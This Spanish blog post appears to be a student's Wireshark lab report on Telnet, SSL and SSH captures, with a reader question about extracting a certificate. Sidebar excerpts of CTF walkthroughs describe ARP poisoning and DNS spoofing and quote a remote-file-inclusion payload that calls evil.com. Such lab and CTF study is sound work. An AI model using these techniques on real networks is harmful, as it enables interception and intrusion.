2.1. Capturando tráfico con Wireshark

Primera parte: 

Análisis de la traza telnet-raw.pcap

Hay dos sesiones Telnet

1ª-

SO: OpenBSD/i386 

login fake
password user

comandos 

ls 
ls -a
/sbin/ping www.yahoo.com
exit

2ª-
SO: OpenBSD 2.6-beta

login fake
password user

comandos

ls
ls -a
/sbin/ping www.yahoo.com
exit

Segunda parte: 

El certificado se recibe en el paquete dos, server hello SSL 3.0

Cipher Suite: TLS_RSA_WITH_RC4_128_MD5 (0x0004)

Significa que se usará un algoritmo de llave pública RSA  para verificar las firmas e intercambiar información encriptada RC4, siendo MD5 la función hash para verificar el contenido.  

 Tiene una longitud de 1020 bytes

 emitido por http://ocsp.verisign.com
para             login.passport.com
válido         01/09/2004 hasta 02/09/2005 

 Se puede extraer el certificado



Se asegura la identidad del servidor login.passport.com de Microsoft

Tercera parte: 

Analizamos esta traza con tráfico SSH . Corresponde a una conexión SSH con el servidor forja.mondragon.edu. Podemos comprobar si está online y qué puertos abiertos tiene:


Efectivamente tiene abierto el puerto 22 que corresponde a la conexión SSH.

Vemos que los mensajes encriptados comienzan a partir del paquete 20 tras haberse negociado el cifrado (aes 128 ctr) y las claves.

A diferencia del CBC, el CTR significa que tanto la encriptación como el desencriptado es paralelizable.

A partir del intercambio de claves Diffie-Helman todo va encriptado

No es posible por lo tanto ver contraseñas, pero podemos suponer que el paquete 20 contiene la autenticación.

 Actualizo información del host forja.mondragon.edu

 Server: Apache/2.2.16 (Debian)
X-Powered-By: PHP/5.3.3-7+squeeze27


Comentarios

  1. Unknown29 de septiembre de 2015, 10:50

    Gran trabajo. Un pregunta ¿Como has hecho para extraer el certificado?
    Gracias

    ResponderEliminar
  2. jose29 de septiembre de 2015, 11:00

    Con wireshark vete a la entrada

    Handshake Protocol: Certificate

    y luego a la subentrada

    Certificate (id-at-commonName=...

    copias entonces los bytes en binario y luego con Hex Workshop u otra herramienta similar los pegas en un archivo que puedes guardar con extensión crt.

    ResponderEliminar

Publicar un comentario

Entradas populares de este blog

Actualizando a LEDE (Openwrt based) el router Afoundry EW-1200

Imagen
Tenemos aquí un router "chino" que en principio llama la atención por las 6 antenas que trae. Por el precio sería un router de gama media-alta. Aquí viene una review. Me quedo con la aparente potencia del procesador  Mediatek  MT7621   de 2 núcleos a 880 Mhz y la capacidad de emitir wifi simultáneamente en las bandas de 2.4 y 5 Ghz. Incorpora además -  128 MB  DDR3 RAM - 128 Mb SPI flash - 1 USB 3.0 Funciona bastante bien, pero la interfaz web es demasiado austera y deja muchos parámetros ocultos que lo harían más potente. En concreto trae instalado el Openwrt Barrier Breaker 14.07 pero modificado. Para manipularlo abrimos la carcasa y conectamos por el puerto serial que trae, en este caso de solo 3 pines Rx,Gnd,Tx. No trae JTAG. Para conectar usamos de nuevo un cable prolific  Plugable USB to RS-232 DB9  y un  Serial Port Converter  JY-R2T V1.2 RS232. Al ser una conexión de solo tres pines sin VCC (alimentació...
Leer más

vulnhub walkthrough MORTAL KOMBAT: 1: ARP poison routing + dns spoofing, ssrf hash-length attack

 https://www.vulnhub.com/entry/mortal-kombat-1,383/ You'll need to master and chain together multiple vulnerabilities 1. Se nos presenta lo siguiente Curl test page admin area  (works only if localhost) test page testpage: http://192.168.2.24/index.php?url=http://google.com Probamos lfi http://192.168.2.24/index.php?url=http://127.0.0.1/adminArea.php you can only render page from google.com domain 2. Tenemos que spoofear la petición dns de la máquina virtual haciéndole creer que "google.com" es 127.0.0.1 para poder acceder a adminArea.php.  en kali usar ettercap - configurar etc/ettercap/etter.dns google.com A 127.0.0.1 - Arrancar y hacer mitm arp poisoning seleccionando target1 la víctima y target2 el router - Activar dns spoofing 3. Accedemos a adminArea.php con Burp <!-- After the PT @Bytevsbyt3 told me that my page was really unsecure. He told me that he pwn the server via RFI with ?file=http://evil.com/rfi.txt I read about this vulnerability and now i fixed it. N...
Leer más

SIXES: 1: Walkthrough Advanced-Hard Boot2Root machine: Cookie stealing + jpg shell + pwn BOF ret2lib NX ASLR

Imagen
  https://www.vulnhub.com/entry/sixes-1,380/ Advanced-Hard Boot2Root machine intended to be used in a Workshop/CTF beside Shellmates Club. Este es el primer walkthrough de esta máquina en internet. Tiene una serie de movimientos con los que se puede aprender mucho ;) 1.  Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-08 09:50 CET Nmap scan report for sixes.home (192.168.2.28) Host is up (0.016s latency). Not shown: 65531 closed tcp ports (conn-refused) PORT     STATE SERVICE 21/tcp   open  ftp 22/tcp   open  ssh 80/tcp   open  http Accedemos al ftp lftp 192.168.2.28:~> dir -r--r--r--    1 0        0             233 Oct 03  2019 note.txt lftp 192.168.2.28:/> cat note.txt DONE:   - Develop the web application frontend and backend   - Add a firewall to block malicious tools TODO:   - Hire a Pentester to secure the web applicati...
Leer más